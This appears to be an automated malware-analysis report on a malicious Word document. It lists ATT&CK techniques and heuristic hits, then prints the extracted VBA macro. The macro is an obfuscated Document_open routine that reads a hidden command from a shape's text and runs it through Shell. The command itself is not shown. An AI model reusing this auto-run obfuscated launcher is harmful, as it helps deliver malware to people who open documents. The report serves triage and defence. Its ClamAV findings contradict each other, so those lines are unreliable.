Verdict: MALICIOUS
Risk Score: 272

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro uses a Shell() call and references cmd.exe and PowerShell, indicating an attempt to execute arbitrary commands. The command string handed to Shell() is not written out in the macro source: the preview below shows it being read from the TextFrame of a document shape (KatBHriqA.Shapes(...).TextFrame.ContainingRange) and concatenated with a run of variables that the preview never assigns, so the visible macro is only the launcher. The obfuscated command line suggests the execution of a secondary payload, likely a downloader.
Heuristics (9)

- ClamAV: Doc.Malware.Generic-6774449-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Generic-6774449-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]: Potential Shell call in VBA. Matched line in script (shown with its neighbouring lines):
  `End Select`
  `FtwhjPq = Array(hiVNVLv, KLAVpY, GKEbDmF, Interaction.Shell(sEjRuJQiwTR, YlMXKBAfFO), qKtzWspp)`
  `Select Case SNnaZrTmLHiHUY`
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low, OLE_VBA_DOCOPEN]: Document_Open macro. Matched line in script (shown with its neighbouring lines):
  `Attribute VB_Customizable = True`
  `Private Sub Document_open()`
  `On Error Resume Next`
- Suspicious cmd.exe invocation with execution flag [high, SC_STR_CMD]: Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell [high, SC_STR_POWERSHELL]: Reference to PowerShell
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9695 bytes |

SHA-256: 3fbf482cbb2dc66e86c9325705827acb199d7c61d407a5191c16f173836c2e35

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 217 of 259 identifiers look randomly generated (e.g. 'KVAZbOhGkhrQLjishEwKrFnV'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "KatBHriqA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case EfzzTlQZzBMMktzrwGFK
Case 302985658
QIstfUNWUqiDVh = 292571205
LHnwtzHrASulJYSolC = 99715709
EZFvMcjVdjYPzcvwXvHSBBt = ChrB(87375796 / ChrB(167004301))
NwYtSSSBPlBrmRQmOTt = mjdTRpvwpCjsWlPkzjOF
Case 324156529
MJzfJqBPnZTuojSFccXVLNEI = 141838337
BfoiFnhpUTVmfE = 308291839
PHYcwiRrHlibmzEoJIo = ChrB(144101470 / ChrB(172414226))
UfMzMzjqzSbkzzj = 299235113
End Select
Select Case uGwHAXwXTzhoJFPAhrzj
Case 178087394
jOfVWJzUkrSzjDdMQEs = 94324861
aPwYCCBuwkQCWXkci = 8196952
XzPqVKYMXUavnMHIwjwUGw = ChrB(170551761 / ChrB(247474683))
CzKjskmDDqRLYcO = piZXpdpOOlvhhiYZdkTM
Case 88957913
ikorkVpzZEipQUANRYHv = 113958848
pEWURshoICQJzpj = 325493894
TZRMqzrREYQSuFRPXvkVPDw = ChrB(107467911 / ChrB(244416707))
fYHULiUjnWAuwEiCNTQWNwzu = 186897929
End Select
Select Case CqWjOCvTYSYPziwtiww
Case 262999763
OjkTddIGcBuPQBpjj = 88807945
wAUfRzwKnrsGhkLoHlN = 246845942
nNvQdAicGKvjWrNtETU = ChrB(201888119 / ChrB(119606277))
PkuNiFNiwVbBJnZOoz = ijjwXLtzuDSsGGSzL
Case 145497373
VcOYMZHVhaTpfVOjo = 229686226
XClHSffcVurpOsXdnUITWQ = 276321706
XbNnXsXiOXwNjVvt = ChrB(215813596 / ChrB(324962136))
aqkFzHrbPfPQHMakrRsFcW = 83218094
End Select
Select Case WBNZLPNajBIlhUnzhULqcGLi
Case 229906709
QiXQOEDnhZaTzoQ = 232642300
CoLbWccJIlOUPqiqEwiD = 120150696
EhumOYOXWataIuXftGuHGS = ChrB(269177929 / ChrB(119361431))
jwdtqljNPjihkOEvk = oboijSYEXIKjmscUi
Case 183742536
djoNNtKtwJsqMVCAqdAMK = 140114537
NXCizlFPjcKGizOboZZav = 207311510
wKjslrdPaIvbpKKNH = ChrB(291626007 / ChrB(300755074))
NBOUBbBLnkvpiFE = 157875276
End Select
Select Case qdGzvoGfpGBSIcMS
Case 309956009
XVlTJBdhGDONwRLvO = 254393417
XLofVkzvZcaBHHkMUZWTFTNh = 20513322
bIjHMNZTXFiqQiKFE = ChrB(37989858 / ChrB(213147658))
GGNErVrStDwHbE = rLSPMcojfiiJoJz
Case 99855011
BBKVviPqVGaUHbO = 73635738
TtmqTZSXhaNMDJtoqFa = 306615690
vhCYrVNOYCPwNpFcRhcswN = ChrB(27491890 / ChrB(18724386))
SwjjRVoQmXMkRcDEIJXz = 94764692
End Select
Set UYFNjwnYZ = KatBHriqA.Shapes(iLShBW + "sqicjuu" + wwPrJ).TextFrame
Select Case pHtYqjLtkJJvzjb
Case 182326675
HhYHiRYFQwABRiaFWzajF = 274545582
JnUkjRFrHHmfjpALq = 136857175
akKsTfjpciAvfROPTJ = ChrB(213325854 / ChrB(271443232))
KHttiwqPWlkLmPizvAFAbd = GMHOUajCJfiPcRw
Case 268314099
sZGzQjsBfQYIbpMhzmhWk = 142829940
pjajHAGhwMXHCXLqcOMoKH = 297746231
qSidfQRwWkQNpDlBZicwD = ChrB(220856429 / ChrB(68532068))
nvEIXjihqsppRcCf = 305400112
End Select
Select Case tnSTkBuLXZEMibRvjuBMP
Case 139868938
ohfMYDjijjNqJNcRbBjfQpSw = 244013638
GSzLUSYodmFpWI = 282899114
VfUlHiGcaKipizOibYwNiXLv = ChrB(117297368 / ChrB(140401773))
qLmfXoUUnczsYMWlKjiGi = WNwMdRwUYTmwQRofKBN
Case 205249475
GbjXBImBLjPESoYjLLD = 142608249
DfFZwFwiZhszzQlSpb = 58337930
SMkXuwcQwzpJJIDw = ChrB(174168355 / ChrB(325378365))
CpWmCWFUYmOVjvJ = 425149
End Select
Select Case DQNjqVZDvvlVpjAozaPjOF
Case 82920244
PazshOAtZOEvoLblzF = 311629366
ZRZzLIWDzHXzEpRQX = 218348860
jvsvbcEAnzijJKuzzA = ChrB(330320036 / ChrB(219330194))
swvRrGrwuKNSjOWhVzW = HiESaNnJsTPZzzo
Case 335059556
dkVMCtoQOavYPbDbaRJscqdT = 227569234
auoSmaXlrMBtFpP = 16497718
nrkcrMwZfiGTnHBi = ChrB(317948042 / ChrB(123141848))
cvoUAikqajLUcadqczdiipt = 41023947
End Select
Select Case DJjSEifhOHEkzYAS
Case 216068744
wKzMNlQNYfAwMaoOODGtw = 192285079
RnDfCmVkOwIMiNqwvBqGzhRu = 197735308
kJwLnlVNiZKGObDvlzENGBYH = ChrB(77062413 / ChrB(290354924))
XwjVIBGBLnDLWrU = RmonPCEwTqQqjlpzvjzR
Case 336745060
BFIZrHimiWlWHV = 151041559
pUrmBSkQSazDQqt = 20178989
MkjfqLzOhIuEMiUcqqdZ = ChrB(80536772 / ChrB(16269359))
UsHRJfVrciquknZzIuYTJ = 278668537
End Select
Select Case GNibNRBllmZvoajpmKnPRzA
Case 254644916
kzbRNXswaSSoIzUAvnwm = 235094167
zhMKvMwZINrwcTaUYPjwOHQB = 198596046
TPVKDzsowtFCbjzA = ChrB(69137988 / ChrB(37165150))
KVAZbOhGkhrQLjishEwKrFnV = OVozzOzKDUsSptvWtHHG
Case 191394453
WsnSwMvFEhftNtsGlTuFHMq = 172289972
KCowzfPDUzwLjSkPwPKnwjC = 196104398
WoLXmKCNblJHHGCQqsuwuF = ChrB(6747448 / ChrB(65581983))
IwjmviAKLbrDjhptwFjaHrJ = 54496962
End Select
sEjRuJQiwTR = UYFNjwnYZ.ContainingRange + HhrRnBjd + ajHJzv + UjiRn + MKKFC + pqscTK + zEbXX + RKvizJ + CfvRTSz + wKqQQUb + LKGdi + uRXVIaG + pzYtki + BYMiIAqT
Select Case jAIlFZTQiTWbIw
Case 303510966
zmjsoSownMJZAXK = 305096374
MtFEHjrOlQQlhhUDuFZwj = 90335172
MLztPtPKJbuwCoDqG = ChrB(292375651 / ChrB(195224360))
BYLGipWGSkwzwb = tJmbUVFGJnlSOqPTFFKPozr
Case 95165351
XJsZfwwbwKjTQJhvRBT = 298122397
HQCQqrnMEuSYBwMNhd = 280241664
rSjjApwdTWzYVDQtqIpEKP = ChrB(287610528 / ChrB(106244597))
uPMVikXcGfojTQBu = 65070697
End Select
Select Case zKbKBGuWwoZEJAjAbb
Case 32792983
wBOHEFZbqElTNpYhM = 344208
QPzVDsatLiiPBwzXwvTFvjTf = 300472905
FrTbwobcoBwjLP = ChrB(196905285 / ChrB(82696763))
wIpkVPSclsuDjwSbA = jakjtnZKwZPkDbiSWXESkc
Case 7269036
MwjYFEjEKdumdQPBLKTsMBoT = 138459047
ZvXiBHZlTzHAFrsKZ = 175611557
woGHCHZIImLHNDoflhcb = ChrB(261371211 / ChrB(87878369))
wRuKFbABbOmYbTnVacwQzIq = 302489075
End Select
Select Case QaFlwnNLRGYahDbhDEDKMLwH
Case 99461615
cQWKrlmwDhnjDAXC = 290651975
aVYPZzmqztkEizWmLwp = 50293079
nnjztuTADnKTWjtlN = ChrB(288516685 / ChrB(153415485))
AmtNzDpNRpbNkKnhoPf = SpwGalHRcBwERjO
Case 3091730
WApEGjNMwiMsLwzMRFLqmnN = 318663520
kPrWvBvnnSPqALGiudC = 307877144
RFAszdDJIimtjWTWpAh = ChrB(109699847 / ChrB(36565427))
dhWRuEIsJLBzTKqivXs = 193183989
End Select
Select Case IRJPZwTREAIQvADmDVOH
Case 232329794
ROLFijphBBzXrYndOihv = 241454098
jHiOqCbohGuczuDTS = 257953950
XwHRXJizaHkanuCfEWQp = ChrB(255714183 / ChrB(38375481))
TsdOYtavMtTNQcpK = LDBjzjGizPwwCzp
Case 113139361
nZuuGFzMYjUjmCOMKijEj = 145931801
WfbibwJwdwipQQKF = 325362337
UZAmBLMjkrTGME = ChrB(114055019 / ChrB(82270249))
PibYNOjqkHNwvAYmDMw = 82449979
End Select
Select Case jXHNotbPKBFlmffsYKG
Case 282891040
hNwliiEbtkUBdZ = 60110907
rViAdjDULSlRvH = 215224498
oZBJKbKLXoRRlkJFW = ChrB(268607460 / ChrB(217854902))
bqWzKcZLwmflDCMDXzsPLS = oSmibJjvGarpwCEzhCwP
Case 243848706
fNiXGiWvRdJOiiX = 304216272
CQqYKLNOASALNMDrjnYAEDzZ = 71962091
OjkUabnDwzujVCV = ChrB(56166336 / ChrB(40395521))
VkERGWCrwuuzSROBz = 216484479
End Select
Select Case MnwAHQMJwdzSXUawRpRWK
Case 49909692
JvXoNJAiLvvQhWEh = 89718402
NAjvjiEibLZjfaFb = 257237496
jbzAwzoWbDtbMID = ChrB(53522979 / ChrB(325835547))
dOLsjihoEiPVKGj = wlOMDjHMDBlzwRcXcwwYtrrR
Case 123521706
vJHFtmrNKStkDtH = 336755534
iziqmCrtMILFHuztwozFzI = 333383299
kHKiruERuBJTkQI = ChrB(49034278 / ChrB(104162790))
jijICXwrGEJtrawZ = 41558468
End Select
Select Case KTdRtoOOAOAILn
Case 91158619
IrTFRSplOEDaATmrPvUoI = 286990983
ZIlUjtppwpLIGpC = 254198587
irDoloOhcJtPSZbRitwjwFs = ChrB(167930896 / ChrB(103522429))
loKfBMJdKRoUoUX = HkvZdPkrYwGGsYwdZiCZWw
Case 46793727
GpPJcNFbJMzIdqiVETHF = 41275774
klTLvKRzQKdPTn = 4558619
OKriwjbpzizhVCpBaDF = ChrB(196779335 / ChrB(276693462))
SuJLvnfOXqUdFwObG = 25331237
End Select
Select Case wibEfBiDmKvCHwVDamZN
Case 302188220
iGzPSMcnvCjrMfBLWKjXzn = 12626716
KjFUtRilkIAUEQiRbzOtT = 108785457
pCOQPiWpqFPEiGHtiUwHE = ChrB(206851022 / ChrB(219950166))
GbRvzYIQuwQSfBS = NSJPoMzLTGkZUJj
Case 65649645
HJnMaqSwwJkqpOcBrt = 248372023
SRubGctojwlRGzXrit = 252783718
rSqCPUdrHXdPvoCpPMGw = ChrB(317826249 / ChrB(199345666))
CYSjsqkWzHJizbrL = 247684267
End Select
Const YlMXKBAfFO = 0
Select Case ESFVSWTaABXkPco
Case 272361450
jDYqmLwCCUGLEAPzoo = 133226252
biwsjEjBwSqOkobuTSSGJSQ = 12829640
OwAIlaoUwrwGfJhc = ChrB(308713271 / ChrB(27552668))
iraQZUfWWNjISufRIitNr = uowconIkiOOjXV
Case 266208257
boFESHMijLAsZtBrsbzl = 131567734
fsNljVulXKdcHFHmkmcNwdnQ = 72116205
MXnvYCLfINqjYrounpOwm = ChrB(321083104 / ChrB(231755479))
rKJGzCEwawIWwbl = 174947366
End Select
Select Case GuMAsiQXXhLwrmCw
Case 270577379
HFduNjnQzYQSUY = 220597050
CztZqjfpjGTNICHpGVZskMh = 192812114
cisGFMmOwjDFPMXZ = ChrB(262946599 / ChrB(92615355))
PZHzQbMzwoIqRPM = BmiaujwJSEkqICSw
Case 329542862
OmUkbfsMoaqtlpCwWnF = 257874490
iazfMrVqwWMsrBZs = 110633388
CihsYTZTunKjfqKN = ChrB(210308044 / ChrB(79682046))
FPoXWsDiAtncFFcDFf = 274190602
End Select
FtwhjPq = Array(hiVNVLv, KLAVpY, GKEbDmF, Interaction.Shell(sEjRuJQiwTR, YlMXKBAfFO), qKtzWspp)
Select Case SNnaZrTmLHiHUY
Case 332391987
YIcIAbHHQlQjiZYtW = 122032941
HjhGNqCkMwPcmQ = 233372889
vqtBrFjKnbmIljp = ChrB(246841523 / ChrB(14096174))
rhrBPRwqvIBJdQvVcC = QLBDXSlDuwcJdaQZBNu
Case 178958212
DAKYIizWNQHmJlJpiTi = 194081950
ErSwXjMrtHibANLr = 206245899
onhhiVXUoHjXtLzNw = ChrB(56529878 / ChrB(286587431))
lvlfTIZKIYwwwFupjXJ = 324988979
End Select
Select Case iJjBPrdwWwYEVFmDFJurWd
Case 99016873
tipGNmjMQUCRPthqXjBB = 146518008
LQXrtjhJQAuFHkBWikQMoBCU = 266645949
bEUnbNIuTYjWswfG = ChrB(23413607 / ChrB(11633140))
JlwpAARkJKJOCDhIdp = YhzMQdmMrUhhzAziafOT
Case 251785506
cwkKKhTKoCRZcpMY = 207295343
NoZQcdLNEYGcOVrO = 29298394
cGSFtjfiPYXISCzCGzkMVHww = ChrB(192891038 / ChrB(308657195))
LnwiOlMvYtIusk = 328622738
End Select
End Sub